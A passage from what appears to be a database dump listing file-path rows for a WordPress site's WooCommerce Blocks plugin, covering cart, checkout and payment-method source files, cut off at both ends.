mmmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/style.scss'),(8777,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/test/block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/test/block.js'),(8778,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/test/slots.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/test/slots.js'),(8779,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/types.ts'),(8780,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/block-settings/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/block-settings/index.tsx'),(8781,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/editor-utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/editor-utils.ts'),(8782,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/hacks.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/hacks.ts'),(8783,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/icon.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/icon.js'),(8784,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/index.js'),(8785,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/cart-express-payment.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/cart-express-payment.js'),(8786,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/checkout-express-payment.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/checkout-express-payment.js'),(8787,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/index.js'),(8788,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment/style.scss'),(8789,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment-methods.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/express-payment-methods.js'),(8790,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/index.js'),(8791,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/no-payment-methods/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/no-payment-methods/index.js'),(8792,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/no-payment-methods/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/no-payment-methods/style.scss'),(8793,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-method-card.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-method-card.tsx'),(8794,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-method-error-boundary.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-method-error-boundary.tsx'),(8795,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-method-options.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-method-options.js'),(8796,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-methods.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/payment-methods.js'),(8797,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/saved-payment-method-options.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/saved-payment-method-options.tsx'),(8798,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/style.scss'),(8799,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/test/payment-methods.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/test/payment-methods.js'),(8800,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/test/saved-payment-method-options.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/payment-methods/test/saved-payment-method-options.tsx'),(8801,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/sidebar-notices/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/sidebar-notices/index.tsx'),(8802,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/use-forced-layout/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/use-forced-layout/index.ts'),(8803,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/use-forced-layout/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/use-forced-layout/types.ts'),(8804,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/use-forced-layout/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/use-forced-layout/utils.ts'),(8805,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/index.tsx'),(8806,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/switcher.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/switcher.tsx'),(8807,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/types.ts'),(8808,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart-checkout-shared/view-switcher/utils.ts'),(8809,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/block.json'),(8810,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/edit.tsx'),(8811,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/index.tsx'),(8812,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/catalog-sorting/style.scss'),(8813,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/attributes.ts'),(8814,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/block.json'),(8815,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/block.tsx'),(8816,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/checkout-order-error/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/checkout-order-error/constants.js'),(8817,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/checkout-order-error/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/checkout-order-error/index.js'),(8818,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/checkout-order-error/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/checkout-order-error/style.scss'),(8819,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/context.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/context.ts'),(8820,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/edit.tsx'),(8821,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/empty-cart/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/empty-cart/index.js'),(8822,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/empty-cart/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/empty-cart/style.scss'),(8823,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/additional-fields.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/additional-fields.tsx'),(8824,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/attributes.ts'),(8825,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/editor.scss'),(8826,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/form-step-block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/form-step-block.tsx'),(8827,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/form-step-heading.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/form-step-heading.tsx'),(8828,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/form-step/index.tsx'),(8829,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/frontend.tsx'),(8830,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/index.tsx'),(8831,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/attributes.tsx'),(8832,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/block.json'),(8833,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/block.tsx'),(8834,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/constants.tsx'),(8835,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/edit.tsx'),(8836,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/frontend.tsx'),(8837,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/index.tsx'),(8838,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-actions-block/style.scss'),(8839,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/attributes.tsx'),(8840,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/block.json'),(8841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/block.tsx'),(8842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/constants.tsx'),(8843,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/edit.tsx'),(8844,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/frontend.tsx'),(8845,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/index.tsx'),(8846,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-billing-address-block/utils.tsx'),(8847,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/attributes.tsx'),(8848,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/block.json'),(8849,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/block.tsx'),(8850,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/edit.tsx'),(8851,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/frontend.tsx'),(8852,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/index.tsx'),(8853,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/login-prompt.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-contact-information-block/login-prompt.js'),(8854,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.json'),(8855,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.tsx'),(8856,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/edit.tsx'),(8857,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/editor.scss'),(8858,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/index.tsx'),(8859,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/block.json'),(8860,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/edit.tsx'),(8861,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/frontend.tsx'),(8862,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/index.tsx'),(8863,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/style.scss'),(8864,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/block.json'),(8865,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/block.tsx'),(8866,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/edit.tsx'),(8867,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/editor.scss'),(8868,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/index.tsx'),(8869,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/style.scss'),(8870,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/attributes.tsx'),(8871,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/block.json'),(8872,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/edit.tsx'),(8873,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/frontend.tsx'),(8874,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/index.tsx'),(8875,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/slotfills.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/slotfills.tsx'),(8876,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/test/block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/test/block.js'),(8877,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/block.json'),(8878,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/block.tsx'),(8879,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-block